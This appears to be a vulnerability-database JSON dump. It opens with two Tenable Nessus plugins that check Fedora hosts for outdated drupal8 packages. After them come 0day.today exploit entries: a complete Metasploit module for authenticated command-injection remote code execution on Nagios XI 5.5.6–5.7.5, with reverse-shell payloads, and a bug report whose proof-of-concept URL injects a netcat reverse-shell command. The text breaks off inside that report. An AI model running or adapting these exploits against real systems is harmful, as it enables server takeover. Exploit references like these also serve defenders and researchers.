https://www.drupal.org/project/drupal/releases/8.9.9\n\n - https://www.drupal.org/sa-core-2020-012 (CVE-2020-13671)\n\n- https://www.drupal.org/project/drupal/releases/8.9.8\n\n- https://www.drupal.org/project/drupal/releases/8.9.7\n\n- https://www.drupal.org/project/drupal/releases/8.9.6\n\n - https://www.drupal.org/sa-core-2020-011 (CVE-2020-13670)\n\n - https://www.drupal.org/sa-core-2020-010 (CVE-2020-13669)\n\n - https://www.drupal.org/sa-core-2020-009 (CVE-2020-13668)\n\n - https://www.drupal.org/sa-core-2020-008 (CVE-2020-13667)\n\n - https://www.drupal.org/sa-core-2020-007 (CVE-2020-13666)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-12-15T00:00:00", "type": "nessus", "title": "Fedora 33 : drupal8 (2020-6f1079934c)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-13666", "CVE-2020-13667", "CVE-2020-13668", "CVE-2020-13669", "CVE-2020-13670", "CVE-2020-13671", "CVE-2020-28948", "CVE-2020-28949"], "modified": "2022-08-30T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:drupal8", "cpe:/o:fedoraproject:fedora:33"], "id": "FEDORA_2020-6F1079934C.NASL", "href": "https://www.tenable.com/plugins/nessus/144225", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2020-6f1079934c.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(144225);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/30\");\n\n script_cve_id(\"CVE-2020-13666\", \"CVE-2020-13667\", \"CVE-2020-13668\", \"CVE-2020-13669\", \"CVE-2020-13670\", \"CVE-2020-13671\", \"CVE-2020-28948\", \"CVE-2020-28949\");\n script_xref(name:\"FEDORA\", 
value:\"2020-6f1079934c\");\n script_xref(name:\"IAVA\", value:\"2020-A-0545-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0541-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/18\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/09/15\");\n\n script_name(english:\"Fedora 33 : drupal8 (2020-6f1079934c)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"- https://www.drupal.org/project/drupal/releases/8.9.11\n\n- https://www.drupal.org/project/drupal/releases/8.9.10\n\n - https://www.drupal.org/sa-core-2020-013\n (CVE-2020-28948 / CVE-2020-28949)\n\n- https://www.drupal.org/project/drupal/releases/8.9.9\n\n - https://www.drupal.org/sa-core-2020-012\n (CVE-2020-13671)\n\n- https://www.drupal.org/project/drupal/releases/8.9.8\n\n- https://www.drupal.org/project/drupal/releases/8.9.7\n\n- https://www.drupal.org/project/drupal/releases/8.9.6\n\n - https://www.drupal.org/sa-core-2020-011\n (CVE-2020-13670)\n\n - https://www.drupal.org/sa-core-2020-010\n (CVE-2020-13669)\n\n - https://www.drupal.org/sa-core-2020-009\n (CVE-2020-13668)\n\n - https://www.drupal.org/sa-core-2020-008\n (CVE-2020-13667)\n\n - https://www.drupal.org/sa-core-2020-007\n (CVE-2020-13666)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2020-6f1079934c\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.drupal.org/sa-core-2020-007\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://www.drupal.org/sa-core-2020-008\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.drupal.org/sa-core-2020-009\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.drupal.org/sa-core-2020-010\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.drupal.org/sa-core-2020-011\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.drupal.org/sa-core-2020-012\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.drupal.org/sa-core-2020-013\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected drupal8 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-28949\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PEAR Archive_Tar 1.4.10 Arbitrary File Write');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:drupal8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:33\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n 
script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^33([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 33\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC33\", reference:\"drupal8-8.9.11-1.fc33\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"drupal8\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:26:37", "description": "- https://www.drupal.org/project/drupal/releases/8.9.11\n\n- https://www.drupal.org/project/drupal/releases/8.9.10\n\n - https://www.drupal.org/sa-core-2020-013 (CVE-2020-28948 / 
CVE-2020-28949)\n\n- https://www.drupal.org/project/drupal/releases/8.9.9\n\n - https://www.drupal.org/sa-core-2020-012 (CVE-2020-13671)\n\n- https://www.drupal.org/project/drupal/releases/8.9.8\n\n- https://www.drupal.org/project/drupal/releases/8.9.7\n\n- https://www.drupal.org/project/drupal/releases/8.9.6\n\n - https://www.drupal.org/sa-core-2020-011 (CVE-2020-13670)\n\n - https://www.drupal.org/sa-core-2020-010 (CVE-2020-13669)\n\n - https://www.drupal.org/sa-core-2020-009 (CVE-2020-13668)\n\n - https://www.drupal.org/sa-core-2020-008 (CVE-2020-13667)\n\n - https://www.drupal.org/sa-core-2020-007 (CVE-2020-13666)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-12-15T00:00:00", "type": "nessus", "title": "Fedora 32 : drupal8 (2020-d50d74d6f2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-13666", "CVE-2020-13667", "CVE-2020-13668", "CVE-2020-13669", "CVE-2020-13670", "CVE-2020-13671", "CVE-2020-28948", "CVE-2020-28949"], "modified": "2022-08-30T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:drupal8", "cpe:/o:fedoraproject:fedora:32"], "id": "FEDORA_2020-D50D74D6F2.NASL", "href": "https://www.tenable.com/plugins/nessus/144247", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2020-d50d74d6f2.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(144247);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/30\");\n\n script_cve_id(\"CVE-2020-13666\", \"CVE-2020-13667\", \"CVE-2020-13668\", \"CVE-2020-13669\", \"CVE-2020-13670\", \"CVE-2020-13671\", \"CVE-2020-28948\", \"CVE-2020-28949\");\n script_xref(name:\"FEDORA\", 
value:\"2020-d50d74d6f2\");\n script_xref(name:\"IAVA\", value:\"2020-A-0545-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0541-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/18\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/09/15\");\n\n script_name(english:\"Fedora 32 : drupal8 (2020-d50d74d6f2)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"- https://www.drupal.org/project/drupal/releases/8.9.11\n\n- https://www.drupal.org/project/drupal/releases/8.9.10\n\n - https://www.drupal.org/sa-core-2020-013\n (CVE-2020-28948 / CVE-2020-28949)\n\n- https://www.drupal.org/project/drupal/releases/8.9.9\n\n - https://www.drupal.org/sa-core-2020-012\n (CVE-2020-13671)\n\n- https://www.drupal.org/project/drupal/releases/8.9.8\n\n- https://www.drupal.org/project/drupal/releases/8.9.7\n\n- https://www.drupal.org/project/drupal/releases/8.9.6\n\n - https://www.drupal.org/sa-core-2020-011\n (CVE-2020-13670)\n\n - https://www.drupal.org/sa-core-2020-010\n (CVE-2020-13669)\n\n - https://www.drupal.org/sa-core-2020-009\n (CVE-2020-13668)\n\n - https://www.drupal.org/sa-core-2020-008\n (CVE-2020-13667)\n\n - https://www.drupal.org/sa-core-2020-007\n (CVE-2020-13666)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2020-d50d74d6f2\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.drupal.org/sa-core-2020-007\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://www.drupal.org/sa-core-2020-008\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.drupal.org/sa-core-2020-009\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.drupal.org/sa-core-2020-010\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.drupal.org/sa-core-2020-011\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.drupal.org/sa-core-2020-012\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.drupal.org/sa-core-2020-013\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected drupal8 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-28949\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PEAR Archive_Tar 1.4.10 Arbitrary File Write');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:drupal8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:32\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n 
script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^32([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 32\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC32\", reference:\"drupal8-8.9.11-1.fc32\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"drupal8\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2023-05-28T04:27:00", "description": "This Metasploit module exploits CVE-2021-25296, CVE-2021-25297, and CVE-2021-25298, which are OS command injection vulnerabilities in the windowswmi, switch, and cloud-vm 
configuration wizards that allow an authenticated user to perform remote code execution on Nagios XI versions 5.5.6 to 5.7.5 as the apache user. Valid credentials for a Nagios XI user are required. This module has been successfully tested against official NagiosXI OVAs versions 5.5.6 through 5.7.5.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-13T00:00:00", "type": "zdt", "title": "Nagios XI 5.7.5 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25296", "CVE-2021-25297", "CVE-2021-25298"], "modified": "2023-02-13T00:00:00", "id": "1337DAY-ID-38194", "href": "https://0day.today/exploit/description/38194", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HTTP::NagiosXi\n include Msf::Exploit::CmdStager\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n 
info,\n 'Name' => 'Nagios XI 5.5.6 to 5.7.5 - ConfigWizards Authenticated Remote Code Exection',\n 'Description' => %q{\n This module exploits CVE-2021-25296, CVE-2021-25297, and CVE-2021-25298, which are\n OS command injection vulnerabilities in the windowswmi, switch, and cloud-vm\n configuration wizards that allow an authenticated user to perform remote code\n execution on Nagios XI versions 5.5.6 to 5.7.5 as the apache user.\n\n Valid credentials for a Nagios XI user are required. This module has\n been successfully tested against official NagiosXI OVAs from 5.5.6-5.7.5.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Matthew Mathur'\n ],\n 'References' => [\n ['CVE', '2021-25296'],\n ['CVE', '2021-25297'],\n ['CVE', '2021-25298'],\n ['URL', 'https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.md']\n ],\n 'Platform' => %w[linux unix],\n 'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],\n 'Targets' => [\n [\n 'Linux (x86)', {\n 'Arch' => [ ARCH_X86 ],\n 'Platform' => 'linux',\n 'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }\n }\n ],\n [\n 'Linux (x64)', {\n 'Arch' => [ ARCH_X64 ],\n 'Platform' => 'linux',\n 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }\n }\n ],\n [\n 'CMD', {\n 'Arch' => [ ARCH_CMD ],\n 'Platform' => 'unix',\n # the only reliable payloads against a typical Nagios XI host (CentOS 7 minimal) seem to be cmd/unix/reverse_perl_ssl and cmd/unix/reverse_openssl\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl_ssl' }\n }\n ]\n ],\n 'Privileged' => false,\n 'DefaultTarget' => 2,\n 'DisclosureDate' => '2021-02-13',\n 'Notes' => {\n 'Stability' => [ CRASH_SAFE ],\n 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],\n 'Reliability' => [ REPEATABLE_SESSION ]\n }\n )\n )\n\n register_options [\n OptString.new('TARGET_CVE', [true, 'CVE to exploit (CVE-2021-25296, CVE-2021-25297, or CVE-2021-25298)', 'CVE-2021-25296'])\n ]\n end\n\n def username\n datastore['USERNAME']\n end\n\n def 
password\n datastore['PASSWORD']\n end\n\n def finish_install\n datastore['FINISH_INSTALL']\n end\n\n # Returns a status code an a error message on failure.\n # On success returns the status code and an array so we\n # can update the login_result and res_array variables appropriately.\n def handle_unsigned_license(res_array, username, password, finish_install)\n auth_cookies, nsp = res_array\n sign_license_result = sign_license_agreement(auth_cookies, nsp)\n if sign_license_result\n return 5, 'Failed to sign license agreement'\n end\n\n print_status('License agreement signed. The module will wait for 5 seconds and retry the login.')\n sleep 5\n login_result, res_array = login_after_install_or_license(username, password, finish_install)\n case login_result\n when 1..4 # An error occurred, propagate the error message\n return login_result, res_array[0]\n when 5 # The Nagios XI license agreement still has not been signed\n return 5, 'Failed to sign the license agreement.'\n end\n\n return login_result, res_array\n end\n\n def authenticate\n # Use nagios_xi_login to try and authenticate.\n login_result, res_array = nagios_xi_login(username, password, finish_install)\n case login_result\n when 1..3 # An error occurred, propagate the error message\n return login_result, res_array[0]\n when 4 # Nagios XI is not fully installed\n install_result = install_nagios_xi(password)\n if install_result # On installation failure, result is an array with the code and error message\n return install_result[0], install_result[1]\n end\n\n login_result, res_array = login_after_install_or_license(username, password, finish_install)\n case login_result\n when 1..4 # An error occurred, propagate the error message\n return login_result, res_array[0]\n when 5 # The license agreement still needs to be signed\n login_result, res_array = handle_unsigned_license(res_array, username, password, finish_install)\n return login_result, res_array unless (login_result == 0)\n end\n when 5 # The license 
agreement still needs to be signed\n login_result, res_array = handle_unsigned_license(res_array, username, password, finish_install)\n return login_result, res_array unless (login_result == 0)\n end\n\n print_good('Successfully authenticated to Nagios XI.')\n # Extract the authenticated cookies and nsp to use throughout the module\n if res_array.length == 2\n auth_cookies = res_array[1]\n if auth_cookies && /nagiosxi=[a-z0-9]+;/.match(auth_cookies)\n @auth_cookies = auth_cookies\n else\n return login_result, 'Failed to extract authentication cookies'\n end\n nsp = res_array[0].match(/nsp_str = \"([a-z0-9]+)/)\n if nsp\n @nsp = nsp[1]\n else\n return login_result, 'Failed to extract nsp string'\n end\n else\n return login_result, 'Failed to extract auth cookies and nsp string'\n end\n\n # Set the version here so both check and exploit can use it\n nagios_version = nagios_xi_version(res_array[0])\n if nagios_version.nil?\n return 6, 'Unable to obtain the Nagios XI version from the dashboard'\n end\n\n print_status(\"Target is Nagios XI with version #{nagios_version}.\")\n\n # Versions of NagiosXI pre-5.2 have different formats (5r1.0, 2014r2.7, 2012r2.8b, etc.) 
that Rex cannot handle,\n # so we set pre-5.2 versions to 1.0.0 for easier Rex comparison because the module only works on post-5.2 versions.\n if /^\\d{4}r\\d(?:\\.\\d)?(?:(?:RC\\d)|(?:[a-z]{1,3}))?$/.match(nagios_version) || nagios_version == '5r1.0'\n nagios_version = '1.0.0'\n end\n @version = Rex::Version.new(nagios_version)\n\n return 0, 'Successfully authenticated and retrieved NagiosXI Version.'\n end\n\n def check\n # Authenticate to ensure we can access the NagiosXI version\n auth_result, err_msg = authenticate\n case auth_result\n when 1\n return CheckCode::Unknown(err_msg)\n when 2, 4, 5, 6\n return CheckCode::Detected(err_msg)\n when 3\n return CheckCode::Safe(err_msg)\n end\n\n if @version >= Rex::Version.new('5.5.6') && @version <= Rex::Version.new('5.7.5')\n return CheckCode::Appears\n end\n\n return CheckCode::Safe\n end\n\n def execute_command(cmd, _opts = {})\n if !@version || !@auth_cookies # Check to see if we already authenticated during the check\n auth_result, err_msg = authenticate\n case auth_result\n when 1\n fail_with(Failure::Disconnected, err_msg)\n when 2, 4, 5, 6\n fail_with(Failure::UnexpectedReply, err_msg)\n when 3\n fail_with(Failure::NotVulnerable, err_msg)\n end\n end\n\n # execute payload based on the selected targeted configuration wizard\n url_params = {\n 'update' => 1,\n 'nsp' => @nsp\n }\n # After version 5.5.7, the URL parameter used in CVE-2021-25297 and CVE-2021-25298\n # changes from address to ip_address\n if @version <= Rex::Version.new('5.5.7')\n address_param = 'address'\n else\n address_param = 'ip_address'\n end\n\n # CVE-2021-25296 affects the windowswmi configuration wizard.\n if datastore['TARGET_CVE'] == 'CVE-2021-25296'\n url_params = url_params.merge({\n 'nextstep' => 3,\n 'wizard' => 'windowswmi',\n 'ip_address' => Array.new(4) { rand(256) }.join('.'),\n 'domain' => Rex::Text.rand_text_alphanumeric(7..15),\n 'username' => Rex::Text.rand_text_alphanumeric(7..20),\n 'password' 
=> Rex::Text.rand_text_alphanumeric(7..20),\n 'plugin_output_len' => Rex::Text.rand_text_numeric(5) + \"; #{cmd};\"\n })\n # CVE-2021-25297 affects the switch configuration wizard.\n elsif datastore['TARGET_CVE'] == 'CVE-2021-25297'\n url_params = url_params.merge({\n 'nextstep' => 3,\n 'wizard' => 'switch',\n address_param => Array.new(4) { rand(256) }.join('.') + \"\\\"; #{cmd};\",\n 'snmpopts[snmpcommunity]' => Rex::Text.rand_text_alphanumeric(7..15),\n 'scaninterfaces' => 'on'\n })\n # CVE-2021-25298 affects the cloud-vm configuration wizard, which we can access by\n # specifying the digitalocean option for the wizard parameter.\n elsif datastore['TARGET_CVE'] == 'CVE-2021-25298'\n url_params = url_params.merge({\n address_param => Array.new(4) { rand(256) }.join('.') + \"; #{cmd};\",\n 'nextstep' => 4,\n 'wizard' => 'digitalocean'\n })\n else\n fail_with(Failure::BadConfig, 'Invalid TARGET_CVE: Choose CVE-2021-25296, CVE-2021-25297, or CVE-2021-25298.')\n end\n\n print_status('Sending the payload...')\n # Send the final request. Note that the target is not expected to respond if we get\n # code execution. 
Therefore, we set the timeout on this request to 0.\n send_request_cgi({\n 'method' => 'GET',\n 'uri' => '/nagiosxi/config/monitoringwizard.php',\n 'cookie' => @auth_cookies,\n 'vars_get' => url_params\n })\n end\n\n def exploit\n if target.arch.first == ARCH_CMD\n execute_command(payload.encoded)\n else\n execute_cmdstager(background: true)\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/38194", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-09-09T22:25:43", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-26T00:00:00", "type": "zdt", "title": "Nagios XI 5.7.5 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25299", "CVE-2021-25297", "CVE-2021-25298", "CVE-2021-25296"], "modified": "2021-02-26T00:00:00", "id": "1337DAY-ID-35875", "href": "https://0day.today/exploit/description/35875", "sourceData": "# nagios-xi-5.7.5-bugs\r\nBugs reported to Nagios XI\r\n\r\n\r\n## CVE-2021-25296\r\n\r\n### Code 
Location\r\n\r\n`/usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php`\r\n\r\n### Code snippet\r\n\r\n```php\r\nif (!empty($plugin_output_len)) {\r\n $disk_wmi_command .= \" --forcetruncateoutput \" . $plugin_output_len;\r\n $service_wmi_command .= \" --forcetruncateoutput \" . $plugin_output_len;\r\n $process_wmi_command .= \" --forcetruncateoutput \" . $plugin_output_len;\r\n}\r\necho $disk_wmi_command;\r\n// Run the WMI plugin to get realtime info\r\nexec($disk_wmi_command, $disk_output, $disk_return_var);\r\nexec($service_wmi_command, $service_output, $service_return_var);\r\nexec($process_wmi_command, $process_output, $process_return_var);\r\n```\r\n\r\n### POC (Works with admin/non-admin authentication)\r\n\r\n`https://10.0.2.15/nagiosxi/config/monitoringwizard.php?update=1&nsp=50c0f98fe9018dc43c81672ad1aeed5fd3f9710f013381519e553f846b5c2a86&nextstep=3&wizard=windowswmi&check_wmic_plus_ver=1.65&plugin_output_len=&ip_address=127.0.0.1&domain=127.0.0.1&username=asdf&password=asdf&auth_file=&plugin_output_len=1024; nc -e /bin/sh 127.0.0.1 4444;&submitButton2=`\r\n\r\nThe `plugin_output_len` variable here is not sanitized and can give `command execution`. 
